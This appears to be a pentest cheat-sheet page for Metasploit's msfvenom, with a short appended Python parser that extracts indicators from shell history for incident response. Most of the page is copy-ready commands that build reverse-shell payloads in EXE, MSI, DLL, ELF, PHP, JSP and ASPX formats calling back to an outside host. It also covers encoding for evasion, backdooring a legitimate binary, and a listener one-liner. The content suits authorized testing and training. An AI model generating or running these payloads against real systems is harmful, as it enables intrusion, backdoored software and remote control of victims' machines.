CyberCheatsheets

msfvenom Cheat Sheet

Generate and encode standalone payloads (reverse shells, shellcode, MSI/EXE/ELF) for authorized exploitation.

Exploitation & Payloads | metasploit, msfvenom, payload, reverse-shell, shellcode | Updated 2026-06-17

Overview

msfvenom is Metasploit's payload generator. It combines payload selection, encoding, and output formatting in one command. Use it to build reverse/bind shells in any format (EXE, ELF, MSI, PHP, ASPX, raw shellcode). Pair a reverse payload with a matching multi/handler listener in msfconsole.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Discover payloads and options

List payloads (filter as needed)

msfvenom -l payloads | grep meterpreter

List output formats (exe, elf, raw, ...)

msfvenom -l formats

List encoders

msfvenom -l encoders

Show a payload's required options

msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options

Windows payloads

64-bit meterpreter EXE

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o shell.exe

Stageless plain reverse shell EXE

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o rev.exe

MSI (AlwaysInstallElevated)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi

DLL for sideloading/hijack

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f dll -o evil.dll

Linux / web payloads

Linux 64-bit reverse shell ELF

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f elf -o shell.elf

PHP reverse shell

msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=443 -f raw -o shell.php

JSP reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f raw -o shell.jsp

ASPX webshell payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f aspx -o shell.aspx

Shellcode (for exploit dev)

C shellcode, bad chars removed

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f c -b '\x00\x0a\x0d'

Python shellcode var named sc

msfvenom -p linux/x86/exec CMD=/bin/sh -f python -v sc

Encoding & evasion

5 iterations of shikata_ga_nai

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o enc.exe

Modern AV detects shikata; rely on it for bad-char avoidance, not evasion.

Inject payload into a legit template binary (-x), keep functionality (-k)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -x /usr/share/windows-binaries/plink.exe -k -f exe -o backdoored.exe

Catch the shell

One-line multi/handler matching your payload

msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 443; run"

Tips

  • The handler payload, LHOST, and LPORT must match the generated payload exactly.
  • Use staged payloads (slash form, e.g. .../meterpreter/reverse_tcp) when bandwidth is fine; use stageless payloads (underscore form, e.g. shell_reverse_tcp) when the stager is blocked.
  • 443 and 53 are good LPORT choices — they're commonly allowed outbound.
  • Set bad chars with -b when writing into a buffer-overflow exploit.
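
For incident response, the command syntax on this page can be read in the other direction. The Python below is an added example, not part of the original cheat sheet: it parses msfvenom invocations found in a shell history and pulls out the callback endpoint and generated file names as hunting leads. The function names and the sample history are constructed for illustration.

```python
import shlex

# msfvenom flags from this cheat sheet that take a value, mapped to a field name.
VALUE_FLAGS = {"-p": "payload", "-f": "format", "-o": "output", "-e": "encoder",
               "-i": "iterations", "-b": "badchars", "-x": "template", "-v": "var_name"}
SHELL_OPERATORS = {"|", ";", "&&", "||", ">", ">>"}

def parse_msfvenom(line):
    """Return a dict describing one msfvenom invocation, or None for other lines."""
    try:
        tokens = shlex.split(line)
    except ValueError:            # unbalanced quotes in a damaged history line
        tokens = line.split()
    # Accept a bare name or a full path, optionally behind sudo.
    idx = next((i for i, t in enumerate(tokens)
                if t.rsplit("/", 1)[-1] == "msfvenom"), None)
    if idx is None:
        return None
    rec = {"options": {}}
    args = iter(tokens[idx + 1:])
    for tok in args:
        if tok in SHELL_OPERATORS:            # ignore whatever the output is piped into
            break
        if tok in VALUE_FLAGS:
            rec[VALUE_FLAGS[tok]] = next(args, None)
        elif "=" in tok and not tok.startswith("-"):
            key, _, value = tok.partition("=")   # datastore options such as LHOST=...
            rec["options"][key.upper()] = value
    return rec

def indicators(history_text):
    """Collect hunting leads: callback endpoints and generated file names."""
    endpoints, files = set(), set()
    for line in history_text.splitlines():
        rec = parse_msfvenom(line)
        if rec is None:
            continue
        opts = rec["options"]
        if "LHOST" in opts:
            endpoints.add((opts["LHOST"], opts.get("LPORT")))
        if rec.get("output"):
            files.add(rec["output"])
    return endpoints, files

# Constructed sample history (commands reuse the cheat sheet's example values).
SAMPLE_HISTORY = r"""cd /tmp
msfvenom -l formats
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o shell.exe
sudo /usr/bin/msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f c -b '\x00\x0a\x0d'"""
```

The extracted endpoints can be matched against egress firewall or proxy logs, and the file names against EDR file-creation events.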
